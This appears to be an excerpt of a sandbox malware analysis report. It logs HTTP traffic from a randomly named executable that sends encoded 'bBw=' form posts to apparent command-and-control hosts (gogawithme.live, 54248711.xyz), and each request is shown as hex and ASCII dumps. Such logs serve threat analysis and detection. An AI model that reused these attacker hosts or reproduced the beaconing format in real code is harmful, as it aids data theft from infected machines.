                                                                                                                        Referer: http://www.gogawithme.live/6gtt/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 66 45 6f 55 73 33 78 62 74 43 48 52 50 62 42 64 6a 61 53 4a 71 34 69 54 73 52 72 7a 50 2f 66 6b 4c 5a 75 73 58 75 6e 2b 56 6d 72 76 32 4c 58 6f 66 47 79 46 59 2b 65 69 73 53 4a 39 37 65 5a 51 32 61 75 6f 55 62 79 63 6c 4f 36 41 46 75 4d 6a 38 6f 72 76 64 39 44 56 59 69 33 64 76 64 56 35 45 6e 6a 76 2f 6e 72 6d 4b 58 61 64 41 50 4e 4a 31 6b 34 4c 37 36 47 4a 30 6d 52 4e 52 42 30 39 66 62 54 53 48 4e 55 2f 67 44 64 57 68 76 58 79 6f 41 31 45 5a 71 4b 6a 38 56 36 42 6f 73 44 55 58 51 66 33 37 31 42 6b 53 54 43 78 32 76 53 4e 62 7a 73 46 77 42 73 6e 7a 68 6e 71
                                                                                                                        Data Ascii: bBw=fEoUs3xbtCHRPbBdjaSJq4iTsRrzP/fkLZusXun+Vmrv2LXofGyFY+eisSJ97eZQ2auoUbyclO6AFuMj8orvd9DVYi3dvdV5Enjv/nrmKXadAPNJ1k4L76GJ0mRNRB09fbTSHNU/gDdWhvXyoA1EZqKj8V6BosDUXQf371BkSTCx2vSNbzsFwBsnzhnq
                                                                                                                        Nov 21, 2024 16:22:57.787565947 CET533INHTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:22:57 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 389
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        34192.168.2.950008209.74.77.109806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:22:59.142610073 CET625OUTPOST /6gtt/ HTTP/1.1
                                                                                                                        Host: www.gogawithme.live
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.gogawithme.live
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.gogawithme.live/6gtt/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 66 45 6f 55 73 33 78 62 74 43 48 52 4f 37 52 64 6d 39 4f 4a 74 59 69 53 69 78 72 7a 64 2f 66 6f 4c 5a 69 73 58 76 54 75 4a 41 54 76 33 75 37 6f 65 46 71 46 66 2b 65 69 6e 79 4a 38 31 2b 5a 68 32 61 6a 43 55 61 4f 63 6c 50 61 41 46 75 63 6a 2f 62 44 73 50 64 44 58 54 43 33 54 79 4e 56 35 45 6e 6a 76 2f 6e 4f 37 4b 58 43 64 41 66 39 4a 76 41 4d 49 32 61 47 4b 38 47 52 4e 56 42 30 35 66 62 54 38 48 4f 51 56 67 47 42 57 68 73 44 79 6f 52 31 44 51 71 4b 6c 68 46 37 4f 75 63 32 4d 5a 41 76 31 31 6e 52 6d 4e 54 57 73 34 75 75 54 4b 42 6c 65 6c 57 73 41 30 47 75 43 38 57 33 32 6e 71 65 6e 52 44 56 62 69 52 4a 6b 74 42 49 55 46 41 3d 3d
                                                                                                                        Data Ascii: bBw=fEoUs3xbtCHRO7Rdm9OJtYiSixrzd/foLZisXvTuJATv3u7oeFqFf+einyJ81+Zh2ajCUaOclPaAFucj/bDsPdDXTC3TyNV5Enjv/nO7KXCdAf9JvAMI2aGK8GRNVB05fbT8HOQVgGBWhsDyoR1DQqKlhF7Ouc2MZAv11nRmNTWs4uuTKBlelWsA0GuC8W32nqenRDVbiRJktBIUFA==
                                                                                                                        Nov 21, 2024 16:23:00.512301922 CET533INHTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:00 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 389
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        35192.168.2.950009209.74.77.109806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:23:01.810756922 CET1638OUTPOST /6gtt/ HTTP/1.1
                                                                                                                        Host: www.gogawithme.live
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.gogawithme.live
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.gogawithme.live/6gtt/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 66 45 6f 55 73 33 78 62 74 43 48 52 4f 37 52 64 6d 39 4f 4a 74 59 69 53 69 78 72 7a 64 2f 66 6f 4c 5a 69 73 58 76 54 75 4a 44 7a 76 32 63 7a 6f 66 6b 71 46 65 2b 65 69 75 53 4a 78 31 2b 5a 34 32 5a 54 5a 55 61 43 69 6c 4c 71 41 46 49 51 6a 2b 75 33 73 57 74 44 58 63 69 33 53 76 64 56 57 45 6b 4c 72 2f 6e 65 37 4b 58 43 64 41 5a 78 4a 68 45 34 49 6c 71 47 4a 30 6d 52 2f 52 42 30 42 66 59 69 42 48 4e 38 76 6a 31 5a 57 68 4d 54 79 72 6a 74 44 66 71 4b 6e 79 31 36 52 75 63 71 74 5a 41 7a 35 31 6d 6c 41 4e 52 57 73 34 66 53 4f 52 79 4d 43 37 46 67 4a 32 48 50 2b 38 78 48 70 75 35 54 6e 49 57 64 61 79 30 38 4f 73 68 4a 47 52 41 41 37 64 65 78 36 69 48 31 72 33 65 68 36 49 36 4d 2b 48 75 2f 66 70 57 62 4e 57 77 45 6a 31 68 46 51 63 68 6c 58 47 2f 79 45 53 30 76 4c 45 37 73 4d 34 6e 67 47 2f 6a 37 41 7a 33 4d 61 65 6e 59 78 71 7a 79 5a 42 6d 51 30 7a 49 4c 50 44 46 4c 78 6f 6b 47 67 42 77 72 75 45 65 5a 5a 64 2f 56 69 46 37 54 61 41 51 47 72 59 50 65 52 31 53 72 68 53 39 33 79 74 65 34 67 67 6c [TRUNCATED]
                                                                                                                        Data Ascii: bBw=fEoUs3xbtCHRO7Rdm9OJtYiSixrzd/foLZisXvTuJDzv2czofkqFe+eiuSJx1+Z42ZTZUaCilLqAFIQj+u3sWtDXci3SvdVWEkLr/ne7KXCdAZxJhE4IlqGJ0mR/RB0BfYiBHN8vj1ZWhMTyrjtDfqKny16RucqtZAz51mlANRWs4fSORyMC7FgJ2HP+8xHpu5TnIWday08OshJGRAA7dex6iH1r3eh6I6M+Hu/fpWbNWwEj1hFQchlXG/yES0vLE7sM4ngG/j7Az3MaenYxqzyZBmQ0zILPDFLxokGgBwruEeZZd/ViF7TaAQGrYPeR1SrhS93yte4ggl0ry8s60ngHQm7KTU2X4RSSGcimiZ8VHwfPZx0uJD9iu0nRhaX686xPiNL/9q42GHrp184LylIgOLcJL30m/cKuk5J9LfvX3sITT4LfQTpgWi5m9fNzYnxvAOVp4Zx+1ZUjDnKOxyN62PCjgL5ZnSZRSxjz1TLyIiS7t0gM0vmHSRT0Fv8DCJ/eB4eNXglJ2x2K35NzcCVEztfna42eXurmwDbVgGq2ITECdiPPhZ6pMn2VI1FA5u05v6AN0XhS3lEPwdTiemTeVMWUB0rkl+aclMQTAWU3knEduw/Vy0t7IbRXZ+q90XZ0cGU2lxkre7t249bwSAkuXB2y53x5Qqo00zqRmA19HxUAnHkje6JLvmURdF4RI5QJDMiXIPuXBy7TsU6nE5B2V89fisJTD47mutEQXh0vEAdovzTooaGVvsKC5ghRVoV8kClq0n+HcRS6z5ucUGvBLtcq88dV6M/2xmEiYXaIEhaxDjNsaG2midPxRgBCsY2/2xMgeNqdP05EHj075XVj+H9yEHP+SnrJWftRQMBvijX8AkJQI0b4bP0quL4aGIjCQm0qRmceR3L7iTu9FU297aHXO5TTMSSrtfpWX1QTOmP62Ezvtnzrm2GkcdxFckN7UJhAzrgieGF/RfWcbGfCh7UvYyBzaFVTN34qWKlmm6BI [TRUNCATED]
                                                                                                                        Nov 21, 2024 16:23:03.175116062 CET533INHTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:02 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 389
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        36192.168.2.950010209.74.77.109806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:23:04.464939117 CET341OUTGET /6gtt/?bBw=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbepy0TXn/sNBWKXnk+HntNHa0bIYL3g==&PBk=f4VDN8Bp14IhbV HTTP/1.1
                                                                                                                        Host: www.gogawithme.live
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Nov 21, 2024 16:23:05.724932909 CET548INHTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:05 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 389
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        37192.168.2.950011161.97.142.144806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:23:11.495727062 CET592OUTPOST /jm2l/ HTTP/1.1
                                                                                                                        Host: www.54248711.xyz
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.54248711.xyz
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.54248711.xyz/jm2l/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 42 30 64 43 6f 4b 74 49 47 71 47 63 74 7a 6f 72 2b 61 37 63 45 31 4b 56 78 75 79 70 33 69 66 33 49 70 7a 78 44 79 51 76 55 44 56 73 56 62 30 41 35 55 6b 30 4a 6f 6c 5a 47 59 61 73 75 2b 64 39 70 51 74 43 31 50 42 76 47 41 56 35 78 78 59 71 69 63 57 39 6a 64 35 49 6f 75 41 57 54 4d 52 30 69 42 78 37 50 56 4a 4e 2b 42 66 44 34 6a 4b 42 65 34 78 46 58 6c 73 47 6d 2f 30 6f 68 32 4e 74 4e 4e 6d 65 2b 48 6c 78 58 67 77 33 54 5a 56 75 67 68 69 78 55 65 6d 74 64 2b 41 4d 35 33 72 64 33 56 6b 73 2f 36 48 37 55 50 37 5a 35 47 68 6f 4c 58 38 34 66 50 73 34 45 36 52 2f
                                                                                                                        Data Ascii: bBw=B0dCoKtIGqGctzor+a7cE1KVxuyp3if3IpzxDyQvUDVsVb0A5Uk0JolZGYasu+d9pQtC1PBvGAV5xxYqicW9jd5IouAWTMR0iBx7PVJN+BfD4jKBe4xFXlsGm/0oh2NtNNme+HlxXgw3TZVughixUemtd+AM53rd3Vks/6H7UP7Z5GhoLX84fPs4E6R/
                                                                                                                        Nov 21, 2024 16:23:12.848418951 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:12 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        ETag: W/"66cce1df-b96"
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                        Nov 21, 2024 16:23:12.848447084 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        38192.168.2.950012161.97.142.144806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:23:14.169044971 CET616OUTPOST /jm2l/ HTTP/1.1
                                                                                                                        Host: www.54248711.xyz
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.54248711.xyz
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.54248711.xyz/jm2l/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 42 30 64 43 6f 4b 74 49 47 71 47 63 69 7a 34 72 38 39 48 63 4d 31 4b 57 30 75 79 70 73 53 66 4e 49 70 50 78 44 33 70 6f 55 32 46 73 57 36 45 41 34 57 41 30 45 49 6c 5a 4d 34 61 74 6a 65 63 51 70 52 51 31 31 4c 42 76 47 41 42 35 78 77 6f 71 69 72 4b 2b 78 64 35 4b 68 4f 41 55 4f 63 52 30 69 42 78 37 50 56 4e 72 2b 46 7a 44 34 53 36 42 63 61 56 47 55 6c 73 5a 68 2f 30 6f 6c 32 4e 54 4e 4e 6d 34 2b 47 34 61 58 6a 49 33 54 59 6c 75 67 30 65 77 66 65 6d 72 54 65 42 4f 39 47 53 30 78 6c 31 31 35 34 71 66 4e 2f 37 79 2b 6e 64 32 61 6c 31 6a 4b 59 73 66 44 64 59 58 61 55 37 51 54 73 2f 44 6b 2f 43 37 6f 39 56 70 6f 6d 38 74 4f 67 3d 3d
                                                                                                                        Data Ascii: bBw=B0dCoKtIGqGciz4r89HcM1KW0uypsSfNIpPxD3poU2FsW6EA4WA0EIlZM4atjecQpRQ11LBvGAB5xwoqirK+xd5KhOAUOcR0iBx7PVNr+FzD4S6BcaVGUlsZh/0ol2NTNNm4+G4aXjI3TYlug0ewfemrTeBO9GS0xl1154qfN/7y+nd2al1jKYsfDdYXaU7QTs/Dk/C7o9Vpom8tOg==
                                                                                                                        Nov 21, 2024 16:23:15.442529917 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:15 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        ETag: W/"66cce1df-b96"
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
